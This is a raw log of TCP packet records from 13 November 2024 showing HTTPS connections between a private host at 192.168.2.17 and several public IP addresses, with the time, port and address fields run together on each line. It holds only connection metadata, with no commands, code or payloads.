                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.847913980 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.849052906 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.849128008 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.849246025 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.849256992 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.892721891 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.100972891 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.100992918 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.101028919 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.101114035 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.101129055 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.102030993 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.102047920 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.102216005 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.102245092 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.102317095 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.150914907 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.150966883 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.151070118 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.151257038 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.151271105 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.184900045 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.184984922 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.185039043 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.185425043 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.185436010 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.187429905 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.187477112 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.187623978 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.187869072 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:03.187890053 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.216473103 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.217215061 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.217242002 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.218106031 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.218111038 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.218183041 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.218192101 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.245209932 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.245546103 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.245572090 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.245913029 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.246220112 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.246289015 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.246387959 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.291332960 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.591593981 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.591672897 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.591754913 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.592602015 CET49716443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.592622995 CET44349716103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597583055 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597608089 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597690105 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597698927 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597712994 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.597738028 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.599662066 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.599668026 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.599704027 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.599937916 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.599977016 CET4434971540.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.600028992 CET49715443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.846179008 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.846220016 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.846288919 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.847510099 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.847559929 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.847749949 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.847779989 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.847799063 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.848015070 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.848037004 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.515300989 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.515605927 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.515631914 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.516721964 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.516782999 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.517865896 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.517946959 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.518127918 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.518136024 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.554362059 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.554869890 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.554888010 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.555929899 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.555996895 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.556385040 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.556448936 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.560669899 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.608669996 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.608690023 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.656678915 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684115887 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684206009 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684365034 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684588909 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684604883 CET44349721162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684617996 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.684735060 CET49721443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.686815977 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.731328964 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:05.737356901 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:06.039844036 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:06.644488096 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.857647896 CET49675443192.168.2.17204.79.197.203
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.894351959 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.894449949 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.894562006 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.895693064 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.895729065 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301814079 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301848888 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301858902 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301892042 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301960945 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.301979065 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.302021980 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325217009 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325289011 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325376034 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325534105 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325555086 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325653076 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325879097 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.325910091 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326015949 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326138973 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326155901 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326216936 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326463938 CET49725443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326495886 CET44349725162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326760054 CET49726443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.326775074 CET44349726162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.327085972 CET49727443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.327111006 CET44349727162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.327342033 CET49728443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.327358961 CET44349728162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345566034 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345593929 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345796108 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345796108 CET49732443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345823050 CET4434973299.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.353635073 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426165104 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426179886 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426204920 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426244020 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426315069 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426321030 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426508904 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426518917 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426542044 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426623106 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426623106 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.426634073 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.427984953 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.427994013 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.428081036 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.428088903 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.459310055 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.459336042 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.459769011 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.459777117 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.513777971 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.556994915 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557007074 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557044983 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557097912 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557143927 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557148933 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557315111 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557322025 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557346106 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557435036 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557435036 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.557445049 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.558232069 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.558238983 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.558303118 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.558310986 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.559154034 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.559160948 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.559336901 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.559344053 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.560118914 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.560136080 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.560189962 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.560198069 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.560257912 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.582772017 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583019018 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583026886 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583281994 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583288908 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583354950 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.583362103 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.625636101 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.673597097 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.673609018 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.673643112 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.673676014 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.673737049 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.680737972 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.680743933 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.680825949 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.680838108 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681291103 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681297064 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681356907 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681364059 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681651115 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681678057 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681723118 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681729078 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.681756020 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.682353973 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.682420015 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.682425976 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.682945967 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.683006048 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.683012962 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.707334042 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.707427025 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.707448006 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.708025932 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.708058119 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.708101034 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.708108902 CET44349720162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.708142042 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.743767977 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.743872881 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.745423079 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.745434046 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.745954037 CET44349724184.28.90.27192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.755642891 CET49720443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.792916059 CET49724443192.168.2.17184.28.90.27
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.798542976 CET44349720162.241.85.172192.168.2.17
